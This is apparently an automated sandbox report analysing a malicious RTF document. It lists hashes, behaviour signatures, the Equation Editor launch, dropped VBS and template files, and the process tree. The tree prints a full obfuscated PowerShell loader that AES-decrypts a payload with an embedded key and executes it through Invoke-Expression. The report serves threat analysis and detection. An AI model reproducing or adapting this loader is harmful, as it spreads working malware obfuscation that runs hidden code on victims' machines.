
Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    23/07/2024, 12:28

General

  • Target

    e628ee1f2b81b8972f53e2b2785d97a1.rtf

  • Size

    110KB

  • MD5

    e628ee1f2b81b8972f53e2b2785d97a1

  • SHA1

    0fa0fe5809f166d707fdcf3a2a866b92a761a92b

  • SHA256

    8fc89bf19f14cfd251b0023a624d9be2eaf9a41328e7d5c6f1c703fea07c841d

  • SHA512

    cfb5abf034fb4105fa1f5b23f40b3070427bb862c701fab29457caf15f1f100be6103d783380490cf6afddc7291db17a75f6ab1e19a82e2650072a94eebb6093

  • SSDEEP

    768:I6/gj/IOvpQ0dXHynngGCobrwTsiCmWv8E:IV/IWC0diFRbahWkE

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e628ee1f2b81b8972f53e2b2785d97a1.rtf"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2880
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI00669725676900661955908584003901CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
          3⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2128

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT8UAXPK\paste1[1].txt

      Filesize

      156B

      MD5

      ad6c37ef980373e9bcbd14810fad34bc

      SHA1

      9c061a1b3608b7c7f1db7cd06c8246913ee11bda

      SHA256

      ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

      SHA512

      30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      a75a762391d1af754346fddb10db3eac

      SHA1

      19031c985ede96a02d3ddeb813cfcff531e33937

      SHA256

      2f4a0ca8147e2d0644ede162eef4315c71a6c0f2b9605b8a5331c2bde9fddab6

      SHA512

      6a522f67bfa5384746cae0d29dd3abcf3866d002b351993e16f11baa0603afdebf352450d7dcf5a0ad2d314e3ed6247978f11ca4d96df42bf2b0c1d2441b4fa3

    • C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS

      Filesize

      54KB

      MD5

      cfbf2e7faea58e9249d4e5f6520851a2

      SHA1

      b27795e6e6282d7d3888ab39f77ad314139497fc

      SHA256

      89c3771f859200a6c3e2d7aea98d0e4c2c21741d9d2117e47dfc2849523be39a

      SHA512

      c5e71d2cd63debf13c2c57807aaeb819f2077423c8ce86770c7d803054fa9f02304fff646ea8f018198089ac2ca1d565a2faab93916be86ff357c6c529e5c164

    • memory/2088-0-0x000000002FF91000-0x000000002FF92000-memory.dmp

      Filesize

      4KB

    • memory/2088-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2088-2-0x000000007181D000-0x0000000071828000-memory.dmp

      Filesize

      44KB

    • memory/2088-32-0x000000007181D000-0x0000000071828000-memory.dmp

      Filesize

      44KB

    • memory/2088-50-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB